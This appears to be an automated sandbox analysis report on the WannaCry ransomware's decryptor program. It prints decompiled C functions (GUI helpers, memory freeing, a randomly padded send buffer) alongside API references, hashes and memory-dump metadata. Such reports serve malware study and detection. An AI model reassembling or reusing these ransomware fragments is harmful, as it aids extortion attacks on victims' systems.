                                                      • Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
                                                      				char _v500;
                                                      				signed int _t22;
                                                      				signed int _t27;
                                                      				intOrPtr* _t32;
                                                      				void* _t40;
                                                      				void* _t43;
                                                      				void* _t44;
                                                      				void* _t45;
                                                      				void* _t46;
                                                      				void* _t49;
                                                      
                                                      				_t32 = __ecx;
                                                      				_push(0);
                                                      				L0041303E();
                                                      				srand(__eax);
                                                      				_t49 =  &_v500 + 8;
                                                      				_t22 = rand();
                                                      				asm("cdq");
                                                      				_t40 = 0;
                                                      				_t43 = _t22 % 0xc8 + 0x1f;
                                                      				if(_t43 <= 0) {
                                                      					L2:
                                                      					_t41 = _t49 + _t43 - 0x13;
                                                      					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
                                                      					_t44 = _t43 + 1;
                                                      					 *((char*)(_t49 + _t44 + 0x14)) = 0;
                                                      					_t45 = _t44 + 1;
                                                      					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
                                                      					_t46 = _t45 + 1;
                                                      					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
                                                      					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
                                                      					if(_t27 >= 0) {
                                                      						E0040D5A0(_t32, _t41);
                                                      						return 0;
                                                      					} else {
                                                      						return _t27 | 0xffffffff;
                                                      					}
                                                      				} else {
                                                      					goto L1;
                                                      				}
                                                      				do {
                                                      					L1:
                                                      					 *((char*)(_t49 + _t40 + 0xc)) = rand();
                                                      					_t40 = _t40 + 1;
                                                      				} while (_t40 < _t43);
                                                      				goto L2;
                                                      			}














                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: rand$srandtime
                                                      • String ID:
                                                      • API String ID: 1946231456-0
                                                      • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                                      • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                                      • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E00405180(void* __ecx, intOrPtr _a4) {
                                                      				intOrPtr _t10;
                                                      				intOrPtr _t19;
                                                      				void* _t26;
                                                      
                                                      				_t19 = _a4;
                                                      				_t26 = __ecx;
                                                      				_t10 =  *((intOrPtr*)(__ecx + 0x44));
                                                      				__imp___mbscmp(_t10, _t19);
                                                      				if(_t10 == 0) {
                                                      					return _t10;
                                                      				} else {
                                                      					_push(_t19);
                                                      					L00412DA0();
                                                      					 *((char*)(__ecx + 0x48)) = 1;
                                                      					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
                                                      						E00405800(__ecx, 0);
                                                      					}
                                                      					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
                                                      						E00405820(_t26, 0);
                                                      					}
                                                      					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
                                                      						return InvalidateRect( *(_t26 + 0x20), 0, 1);
                                                      					}
                                                      					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
                                                      				}
                                                      			}







                                                      APIs
                                                      • _mbscmp.MSVCRT ref: 00405191
                                                      • #860.MFC42(?), ref: 004051A1
                                                      • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                                      • String ID:
                                                      • API String ID: 497622568-0
                                                      • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                                      • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                                      • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 83%
                                                      			E00412A00(intOrPtr* _a4) {
                                                      				intOrPtr _t8;
                                                      				intOrPtr _t9;
                                                      				intOrPtr _t10;
                                                      				intOrPtr* _t14;
                                                      				intOrPtr _t16;
                                                      				void* _t18;
                                                      
                                                      				_t14 = _a4;
                                                      				if(_t14 != 0) {
                                                      					if( *_t14 == 1) {
                                                      						_t2 = _t14 + 4; // 0x5d5e5f01
                                                      						_t16 =  *_t2;
                                                      						 *0x4220dc = E004127A0(_t16);
                                                      						if(_t16 != 0) {
                                                      							_t9 =  *((intOrPtr*)(_t16 + 0x138));
                                                      							if(_t9 != 0) {
                                                      								_push(_t9);
                                                      								L00412C98();
                                                      								_t18 = _t18 + 4;
                                                      							}
                                                      							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
                                                      							 *((intOrPtr*)(_t16 + 0x138)) = 0;
                                                      							if(_t10 != 0) {
                                                      								_push(_t10);
                                                      								L00412C98();
                                                      								_t18 = _t18 + 4;
                                                      							}
                                                      							_push(_t16);
                                                      							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
                                                      							L00412C98();
                                                      							_t18 = _t18 + 4;
                                                      						}
                                                      						_push(_t14);
                                                      						L00412C98();
                                                      						_t8 =  *0x4220dc; // 0x0
                                                      						return _t8;
                                                      					} else {
                                                      						 *0x4220dc = 0x80000;
                                                      						return 0x80000;
                                                      					}
                                                      				} else {
                                                      					 *0x4220dc = 0x10000;
                                                      					return 0x10000;
                                                      				}
                                                      			}










                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e7d7a2d2ee013bc337beabdbd42578881703ff57a30ad9c0a94d6315e8ea3cb2
                                                      • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                                      • Opcode Fuzzy Hash: e7d7a2d2ee013bc337beabdbd42578881703ff57a30ad9c0a94d6315e8ea3cb2
                                                      • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E00404430(intOrPtr __ecx, char _a8) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				char _v16;
                                                      				intOrPtr _t13;
                                                      				struct HICON__* _t16;
                                                      				struct HICON__* _t17;
                                                      				intOrPtr _t26;
                                                      
                                                      				_t26 = __ecx;
                                                      				_t13 =  *((intOrPtr*)(__ecx + 0x59));
                                                      				if(_t13 != 0) {
                                                      					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                                      						E00404530(__ecx);
                                                      					}
                                                      					if(E004045E0(_t26,  &_a8) == 0) {
                                                      						_t16 =  *(_t26 + 0x60);
                                                      					} else {
                                                      						_t16 =  *(_t26 + 0x5c);
                                                      					}
                                                      					_t17 = SetCursor(_t16);
                                                      					L00412CBC();
                                                      					return _t17;
                                                      				} else {
                                                      					_v16 = 0x10;
                                                      					if(__ecx != 0) {
                                                      						_t13 =  *((intOrPtr*)(__ecx + 0x20));
                                                      						_v8 = _t13;
                                                      					} else {
                                                      						_v8 = __ecx;
                                                      					}
                                                      					_v12 = 2;
                                                      					__imp___TrackMouseEvent( &_v16);
                                                      					 *((char*)(_t26 + 0x59)) = 1;
                                                      					L00412CBC();
                                                      					return _t13;
                                                      				}
                                                      			}











                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$CursorEventMouseTrack
                                                      • String ID:
                                                      • API String ID: 2186836335-0
                                                      • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                                      • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                                      • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E00404CF0(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t13;
                                                      				intOrPtr* _t21;
                                                      				intOrPtr* _t22;
                                                      				intOrPtr _t27;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041384E);
                                                      				_t13 =  *[fs:0x0];
                                                      				_push(_t13);
                                                      				 *[fs:0x0] = _t27;
                                                      				_v20 = __ecx;
                                                      				_v4 = 0;
                                                      				_t21 = __ecx + 0x70;
                                                      				_v16 = _t21;
                                                      				 *_t21 = 0x415c00;
                                                      				_v4 = 3;
                                                      				L00412D52();
                                                      				 *_t21 = 0x415bec;
                                                      				_t22 = __ecx + 0x64;
                                                      				_v16 = _t22;
                                                      				 *_t22 = 0x415c00;
                                                      				_v4 = 4;
                                                      				L00412D52();
                                                      				 *_t22 = 0x415bec;
                                                      				_v4 = 0;
                                                      				L00412CC2();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t13;
                                                      			}












                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                                      • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#641#800
                                                      • String ID:
                                                      • API String ID: 2580907805-0
                                                      • Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
                                                      • Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
                                                      • Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00404170(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t12;
                                                      				intOrPtr* _t20;
                                                      				intOrPtr _t25;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413776);
                                                      				_t12 =  *[fs:0x0];
                                                      				_push(_t12);
                                                      				 *[fs:0x0] = _t25;
                                                      				_v20 = __ecx;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                                      				_v4 = 0;
                                                      				_t20 = __ecx + 0x48;
                                                      				_v16 = _t20;
                                                      				 *_t20 = 0x415c00;
                                                      				_v4 = 3;
                                                      				L00412D52();
                                                      				 *_t20 = 0x415bec;
                                                      				_v4 = 1;
                                                      				L00412CC2();
                                                      				_v4 = 0;
                                                      				L00412CC2();
                                                      				_v4 = 0xffffffff;
                                                      				L00412D94();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t12;
                                                      			}











                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                      • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#2414#795
                                                      • String ID:
                                                      • API String ID: 932896513-0
                                                      • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                                      • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
                                                      				intOrPtr* _t18;
                                                      				intOrPtr* _t22;
                                                      				intOrPtr _t23;
                                                      				intOrPtr _t30;
                                                      				intOrPtr* _t35;
                                                      				intOrPtr* _t37;
                                                      				void* _t40;
                                                      
                                                      				_t1 =  &_a12; // 0x40276a
                                                      				_t35 = _a8;
                                                      				if(_t35 ==  *_t1) {
                                                      					_t16 =  &_a4; // 0x40276a
                                                      					_t18 =  *_t16;
                                                      					 *_t18 = _t35;
                                                      					return _t18;
                                                      				} else {
                                                      					do {
                                                      						_t37 = _t35;
                                                      						_t35 =  *_t35;
                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
                                                      						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
                                                      						_t30 =  *((intOrPtr*)(_t37 + 0xc));
                                                      						if(_t30 != 0) {
                                                      							_t23 =  *((intOrPtr*)(_t30 - 1));
                                                      							if(_t23 == 0 || _t23 == 0xff) {
                                                      								_push(_t30 + 0xfffffffe);
                                                      								L00412C98();
                                                      								_t40 = _t40 + 4;
                                                      							} else {
                                                      								 *((char*)(_t30 - 1)) = _t23 - 1;
                                                      							}
                                                      						}
                                                      						_push(_t37);
                                                      						 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                                      						 *((intOrPtr*)(_t37 + 0x10)) = 0;
                                                      						 *((intOrPtr*)(_t37 + 0x14)) = 0;
                                                      						L00412C98();
                                                      						_t40 = _t40 + 4;
                                                      						_a8 = _a8 - 1;
                                                      					} while (_t35 != _a12);
                                                      					_t22 = _a4;
                                                      					 *_t22 = _t35;
                                                      					return _t22;
                                                      				}
                                                      			}











                                                      APIs
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825
                                                      • String ID: j'@
                                                      • API String ID: 41483190-370697233
                                                      • Opcode ID: 26610df6b5a4c2806844896bd07b67cdb6c8bfe7b1f6638f76bfb97b56d4ac40
                                                      • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                                      • Opcode Fuzzy Hash: 26610df6b5a4c2806844896bd07b67cdb6c8bfe7b1f6638f76bfb97b56d4ac40
                                                      • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00407650(void* __ecx, intOrPtr _a4) {
                                                      				intOrPtr _t3;
                                                      				void* _t4;
                                                      
                                                      				_t3 = _a4;
                                                      				if(_t3 != 0x3e9) {
                                                      					if(_t3 == 0x3ea) {
                                                      						_t3 =  *((intOrPtr*)(__ecx + 0x820));
                                                      						if(_t3 == 0) {
                                                      							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
                                                      						}
                                                      					}
                                                      					L00412CBC();
                                                      					return _t3;
                                                      				} else {
                                                      					_t4 = E004076A0(__ecx, 1);
                                                      					L00412CBC();
                                                      					return _t4;
                                                      				}
                                                      			}






                                                      APIs
                                                      • #2379.MFC42 ref: 00407692
                                                        • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                                      • #2379.MFC42(00000001), ref: 00407667
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$time
                                                      • String ID: Wana Decrypt0r 2.0
                                                      • API String ID: 2017816395-4201229886
                                                      • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                                      • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%